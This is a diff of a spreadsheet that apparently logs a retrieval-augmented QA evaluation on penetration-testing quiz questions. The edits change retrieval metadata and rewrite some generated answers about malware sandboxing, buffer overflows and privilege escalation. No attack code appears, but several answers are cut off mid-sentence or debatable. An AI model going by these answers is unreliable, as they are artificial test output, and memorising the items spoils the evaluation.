--- a/dataset_advanced_rag_temp.xlsx
+++ b/dataset_advanced_rag_temp.xlsx
@@ -521,7 +521,7 @@
       <c r="F2" t="inlineStr">
         <is>
           <t>Answer: Using sandboxing technologies to observe behavior
-Explanation: Using sandboxing technologies to observe behavior is the most effective technique for identifying the behavior of potential polymorphic malware. This approach allows analysts to see how malware operates in a controlled environment, making it possible to observe changes and behaviors without risking the integrity of the host system. Options such as 'Passing strings fetched at runtime through a disassembler' can be circumvented by malware that detects disassembler use. 'Intercepting and modifying system calls with the ptrace system call' might not reveal all behaviors, especially if the malware is aware and can disable or mislead ptrace. 'Examining the import address table for unexpected changes' is useful for static analysis but difficult to apply in dynamic analysis scenarios.</t>
+Explanation: Using sandboxing technologies to observe behavior is the most effective technique for identifying the behavior of potential polymorphic malware. This approach allows analysts to see how malware operates in a controlled environment, making it possible to observe changes and behaviors without risking the integrity of the host system. Options such as 'Passing strings fetched at runtime through a disassembler' can be circumvented by malware that detects disassembler use. 'Intercepting and modifying system calls with the ptrace system call' might not reveal all behaviors, especially if the malware is aware and can disable or mislead ptrace. 'Examining the import address table for unexpected changes' is useful for static analysis but difficult, not a method of analysis itself.</t>
         </is>
       </c>
       <c r="G2" t="inlineStr">
@@ -535,17 +535,17 @@
 preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 04959762-acf0-4790-99fb-7524a2352b4c, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 3342a1f7-6035-41e2-b639-fe04c612dd59, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: e6fb6d20-9ca3-4e39-a088-85ce208330ed, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: ee64972b-a5c2-4f26-8620-c7e453c7a373, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: ee64972b-a5c2-4f26-8620-c7e453c7a373, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I2" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J2" t="n">
@@ -553,7 +553,7 @@
       </c>
       <c r="K2" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -599,20 +599,20 @@
       <c r="H3" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: f53bcf96-b827-40a0-b89b-027325a9a32e, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 076aff09-3415-41ea-8059-a0f52827a57d, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 7e2feb30-1a3a-4b3e-b712-d9cbf873f1a0, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: a50681c0-06cb-4ca1-821f-95ab56a6e118, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 94e49890-47aa-4ca3-9707-9d1cb00040dc, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 94e49890-47aa-4ca3-9707-9d1cb00040dc, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 5177461e-afd1-4f30-b34b-33dd723a5123, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I3" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J3" t="n">
@@ -620,7 +620,7 @@
       </c>
       <c r="K3" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -655,7 +655,7 @@
       <c r="F4" t="inlineStr">
         <is>
           <t>Answer: Executing a buffer overflow attack to gain unauthorized access
-Explanation: Executing a buffer overflow attack to gain unauthorized access is the most likely technique for carrying out a privilege escalation attack on modern Windows systems. This method involves exploiting software vulnerabilities to overrun a buffer boundary in memory, which can corrupt adjacent memory space and alter the execution path of a process to execute attacker-controlled code with elevated privileges. Option A: Using a debugger to manipulate running processes and extract data</t>
+Explanation: Executing a buffer overflow attack to gain unauthorized access is the most likely technique for carrying out a privilege escalation attack on modern Windows systems. This method involves exploiting software vulnerabilities to overrun a buffer boundary in memory, which can corrupt adjacent memory space and alter the execution path of a process to execute attacker-controlled code with elevated privileges. Option</t>
         </is>
       </c>
       <c r="G4" t="inlineStr">
@@ -669,17 +669,17 @@
 cowWhySo-pentest-redteam-steering.md (Chunk: 2e8a1379-0fba-4f7a-85eb-7b056917f4e4, Type: dense, Rank: 2)
 cowWhySo-pentest-redteam-steering.md (Chunk: 2fa8fe7f-f321-44f6-85be-f75704ff9974, Type: dense, Rank: 3)
 cowWhySo-pentest-redteam-steering.md (Chunk: 13ada395-dd1a-4edf-a2e1-2da891a263e1, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 4ec985eb-6aff-4249-b9e4-0f5c3aad3885, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 4ec985eb-6aff-4249-b9e4-0f5c3aad3885, Type: sparse, Rank: 5)
 cowWhySo-pentest-redteam-steering.md (Chunk: a51a6d26-c177-466b-aa2a-5de8d47c5fe0, Type: dense, Rank: 6)
-cowWhySo-pentest-redteam-steering.md (Chunk: cbc7a536-fdba-4865-8a42-7b584145799a, Type: dense, Rank: 7)
-cowWhySo-pentest-redteam-steering.md (Chunk: 35cb71f1-4ff9-4877-b911-d338ee000ffe, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: dense, Rank: 9)
-cowWhySo-pentest-redteam-steering.md (Chunk: fdb9ace2-d2c3-419e-a845-2e85c4c092a9, Type: dense, Rank: 10)</t>
+cowWhySo-pentest-redteam-steering.md (Chunk: 35cb71f1-4ff9-4877-b911-d338ee000ffe, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: sparse, Rank: 8)
+cowWhySo-pentest-redteam-steering.md (Chunk: fdb9ace2-d2c3-419e-a845-2e85c4c092a9, Type: dense, Rank: 9)
+cowWhySo-pentest-redteam-steering.md (Chunk: 726c1e0b-212c-426e-aa7c-3636c6fa101e, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I4" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J4" t="n">
@@ -687,7 +687,7 @@
       </c>
       <c r="K4" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -736,17 +736,17 @@
 preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: d81db727-e5e2-44eb-8aa1-20ab3f8883a1, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: a70f6200-1dd0-4d5f-8b64-aa88d40f5e5e, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 54029d28-0316-4b60-b3a4-46cb1d3ed1b7, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: a70f6200-1dd0-4d5f-8b64-aa88d40f5e5e, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 54029d28-0316-4b60-b3a4-46cb1d3ed1b7, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I5" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J5" t="n">
@@ -754,7 +754,7 @@
       </c>
       <c r="K5" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -801,19 +801,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 885d670c-13eb-480a-b114-6464cb752c48, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 885d670c-13eb-480a-b114-6464cb752c48, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 0407d467-a3d5-4e44-8abc-61125edf63c7, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: b96549cf-2f25-40ce-8da2-f5c771be36cd, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 0407d467-a3d5-4e44-8abc-61125edf63c7, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: b96549cf-2f25-40ce-8da2-f5c771be36cd, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 12e2112e-6dac-4ee5-bb17-ffc18f57f1ec, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I6" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J6" t="n">
@@ -821,7 +821,7 @@
       </c>
       <c r="K6" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -874,13 +874,13 @@
 preemware_pentestingeval.pdf (Chunk: 4ec985eb-6aff-4249-b9e4-0f5c3aad3885, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: ee64972b-a5c2-4f26-8620-c7e453c7a373, Type: dense, Rank: 7)
 valentine-writeup-w-o-metasploit.md (Chunk: 864bf539-5c23-48a6-8683-57332c6287aa, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 4b09196a-8b79-4c16-a50f-df9b49b8c5ea, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 4b09196a-8b79-4c16-a50f-df9b49b8c5ea, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 93d14658-5b22-4616-b6e7-c1d7e8d2504c, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I7" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J7" t="n">
@@ -888,7 +888,7 @@
       </c>
       <c r="K7" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -934,20 +934,20 @@
       <c r="H8" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 3342a1f7-6035-41e2-b639-fe04c612dd59, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: ee64972b-a5c2-4f26-8620-c7e453c7a373, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: ee64972b-a5c2-4f26-8620-c7e453c7a373, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 4f2b8ecd-a7ee-4877-8c74-4b0c764a70d0, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e6fb6d20-9ca3-4e39-a088-85ce208330ed, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 91d370a9-8209-4668-b903-1708398faa93, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 9c8cb7b3-6564-437c-abb3-13701475b3c2, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 2ed8c0e8-d43e-4d09-a902-9e44e6d56c0b, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: dbd9551c-209f-4286-a6ee-99530ee8bc83, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I8" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J8" t="n">
@@ -955,7 +955,7 @@
       </c>
       <c r="K8" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -1002,19 +1002,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 3342a1f7-6035-41e2-b639-fe04c612dd59, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 8d479ebf-923b-4de8-adcf-31ea07821612, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e32f0786-db66-459f-9257-ca7a63518524, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 446c016e-ab1a-45cc-bba8-04d6c3f76454, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 831f9734-1696-4ce4-bc1c-6b14be8556f2, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 446c016e-ab1a-45cc-bba8-04d6c3f76454, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 831f9734-1696-4ce4-bc1c-6b14be8556f2, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 2c838caf-4fdc-47c9-ac53-31220f3a2f97, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 2c838caf-4fdc-47c9-ac53-31220f3a2f97, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I9" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 5, Total: 10</t>
         </is>
       </c>
       <c r="J9" t="n">
@@ -1022,7 +1022,7 @@
       </c>
       <c r="K9" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -1069,19 +1069,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: a70f6200-1dd0-4d5f-8b64-aa88d40f5e5e, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: ad4b64b8-0cf3-4dbd-9bd5-c817917d0c9d, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: ad4b64b8-0cf3-4dbd-9bd5-c817917d0c9d, Type: sparse, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 53e5bc02-bd2f-46bf-ad66-9a3bdbeb1634, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 86b4e7ca-0f90-495f-8a03-ae7c47e5d3b4, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 2c838caf-4fdc-47c9-ac53-31220f3a2f97, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 556b101a-99fc-4aaa-a621-3b452315891e, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 556b101a-99fc-4aaa-a621-3b452315891e, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: ac04819c-308e-427d-be42-4bffc6fce7a5, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I10" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J10" t="n">
@@ -1089,7 +1089,7 @@
       </c>
       <c r="K10" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -1136,7 +1136,7 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 2c838caf-4fdc-47c9-ac53-31220f3a2f97, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: ac04819c-308e-427d-be42-4bffc6fce7a5, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: d2b5b7bb-3cbf-4369-9681-a363a52efce3, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 9eff9f90-a6af-4772-be1c-2b9c8e1903fc, Type: dense, Rank: 6)
@@ -1148,7 +1148,7 @@
       </c>
       <c r="I11" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J11" t="n">
@@ -1156,7 +1156,7 @@
       </c>
       <c r="K11" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -1204,7 +1204,7 @@
           <t>preemware_pentestingeval.pdf (Chunk: dccb08f7-fe77-413c-ad44-e332d37d61b1, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 696c12ad-676b-479b-a2f2-cde8fd35dbfa, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 7)
@@ -1215,7 +1215,7 @@
       </c>
       <c r="I12" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J12" t="n">
@@ -1223,7 +1223,7 @@
       </c>
       <c r="K12" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -1258,7 +1258,7 @@
       <c r="F13" t="inlineStr">
         <is>
           <t>Answer: Buffer overflow in a stack-based memory allocation
-Explanation: The scenario described is indicative of a buffer overflow vulnerability, where the application crashes due to excessive, unexpected input sizes that overwrite adjacent memory. This is particularly true if it's a stack-based memory allocation, which is common in programs written in languages like C or C++. The failure to gain execution control despite the use of NOP sled techniques suggests that security mitigations such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) are in place, making it harder for an attacker to exploit the buffer overflow vulnerability for code execution. SQL Injection using time-based techniques, Cross-Site Scripting via form manipulation, and Command injection through input validation errors are other potential vulnerabilities but do not typically cause a server crash directly via input lengths.</t>
+Explanation: The scenario described is indicative of a stack-based buffer overflow vulnerability, where the application crashes due to excessive, unexpected input sizes that overwrite adjacent memory. This can corrupt or overwrite the valid data held in them, including data that controls program execution. This vulnerability can be exploited by attackers to inject malicious shellcode into the input fields of applications, leading thereby potentially to arbitrary code execution on the server. SQL Injection using time-based techniques and Cross-Site Scripting via form manipulation are incorrect as they typically involve manipulating database queries or client-side web application behavior, respectively, without necessarily allowing arbitrary code execution on the server itself. Command injection through input validation errors is a possibility but it's less likely in this context as it involves exploiting improper validation of user input to execute commands on the underlying operating system.</t>
         </is>
       </c>
       <c r="G13" t="inlineStr">
@@ -1269,20 +1269,20 @@
       <c r="H13" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 37a1279b-9bd8-4772-84d8-32116433dad3, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 77e097c4-9362-4342-b54a-3107bf3b1601, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 77e097c4-9362-4342-b54a-3107bf3b1601, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 1471cd95-4d3e-4fbe-8bd7-c8ddc9205b6a, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: ea6341c8-0406-4563-802b-a1286b737502, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: cb888b97-65fc-4308-b210-258c964a394e, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: d1c4b7b3-060c-49f4-bc10-32d940a06c4f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 1471cd95-4d3e-4fbe-8bd7-c8ddc9205b6a, Type: sparse, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: ea6341c8-0406-4563-802b-a1286b737502, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: cb888b97-65fc-4308-b210-258c964a394e, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: a6481f2a-4a32-4aab-8afe-82b2253400e6, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I13" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J13" t="n">
@@ -1290,7 +1290,7 @@
       </c>
       <c r="K13" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -1336,9 +1336,9 @@
       <c r="H14" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 129e9036-2a16-4301-bb5f-01114fc84281, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: sparse, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 129e9036-2a16-4301-bb5f-01114fc84281, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 75597556-2c3f-4be1-9936-b0a9d82dd4df, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 7)
@@ -1349,7 +1349,7 @@
       </c>
       <c r="I14" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J14" t="n">
@@ -1357,7 +1357,7 @@
       </c>
       <c r="K14" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
